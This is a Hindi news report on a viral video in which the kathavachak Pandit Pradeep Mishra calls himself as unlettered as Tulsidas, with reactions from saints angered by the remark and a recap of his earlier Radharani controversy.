 कथावाचक पंडित प्रदीप मिश्रा अब नए विवाद में घिर गए हैं। राधारानी का विवाद अभी शांत भी नहीं हुआ था कि उनका एक और वीडियो सोशल मीडिया पर वायरल हो रहा है। इसके बाद संतों में आक्रोश है। पंडित प्रदीप मिश्रा ने गोस्वामी तुलसीदास को गंवार कहा है। हालांकि इस वीडियो की पुष्टि नहीं करते है। वायरल वीडियो के बाद सोशल मीडिया पर लोगों की प्रतिक्रिया आने लगी है। इसे लेकर लोग तरह-तरह की प्रतिक्रिया दे रहे हैं।

पंडित प्रदीप मिश्रा ने क्या कहा

दरअसल, सोशल मीडिया पर वायरल वीडियो में पंडित प्रदीप मिश्रा कह रहे हैं कि हमें कुछ नहीं आता है, हम तो तुलसीदास जैसे गंवार हैं। केवल शिव का नाम ले लेते हैं और आपके सामने बैठ जाते हैं। हमको तो ये भी नहीं मालूम है, हमें कुछ नहीं आता है। 12 सेकंड का यही वीडियो सोशल मीडिया पर वायरल हो रहा है। हालांकि ये वीडियो कब का है और कहां का है, यह साफ नहीं हो पाया है। पूरे प्रकरण पर पंडित प्रदीप मिश्रा की कोई प्रतिक्रिया नहीं आई है।

संतों में आक्रोश

वीडियो वायरल होने के बाद प्रदीप मिश्रा को लेकर संतों में आक्रोश है। देश भर के संतों ने इसे लेकर नाराजगी व्यक्त की है। टीवी चैनल पर एक संत कार्ष्णि नागेंद्र ने कहा कि सनातन धर्म को लेकर बहुत अनर्गल प्रलाप चल रहे हैं। यह कतई उचित नहीं है। व्यास पीठ सनातन धर्म की सर्वोच्च पीठ है, वहां से ऐसी बातें शोभा नहीं देती है। तुलसीदास जी महाराज परमज्ञानी हुए। वह महाविद्वान नहीं थे। ऐसे महापुरुषों को गंवार कहना अनुचित है।

इसके साथ ही एक टीवी चैनल से बात करते हुए त्रिशुला बाबा ने कहा कि तुलसीदास को गंवार कहना अनुचित है। नाम शंकर का लेते हो और जहर उगलते हो। सनातन को स्थापित करने वालों के खिलाफ अभद्र टिप्पणी करते हो। त्रिशुला बाबा ने कहा कि सनातन धर्म के खिलाफ बोलने वाले कथावाचक प्रदीप मिश्रा का बहिष्कार करो।

उनके पैर के बराबर भी नहीं

वहीं, एक संत ने और कहा कि खुद की तुलना गोस्वामी तुलसीदास से करने वाले पंडित प्रदीप मिश्रा उनके पैर के धुल के कण के बराबर नहीं हैं। तुलसीदास से तुलना पर इनको शर्म आनी चाहिए।
प्रेमानंद महाराज भी लगा चुके हैं लताड़

गौरतलब है कि तुलसीदास से पंडित प्रदीप मिश्रा राधारानी पर भी टिप्पणी कर चुके हैं। राधारानी विवाद को लेकर वृंदावन के संत प्रेमानंद महाराज जी ने भी प्रदीप मिश्रा को काफी लताड़ लगाई थी। इसके बाद उन्होंने माफी मांगी थी। बाद में एमपी सरकार के मंत्री कैलाश विजयवर्गीय ने दोनों के बीच सुलह कराई थी।

]]>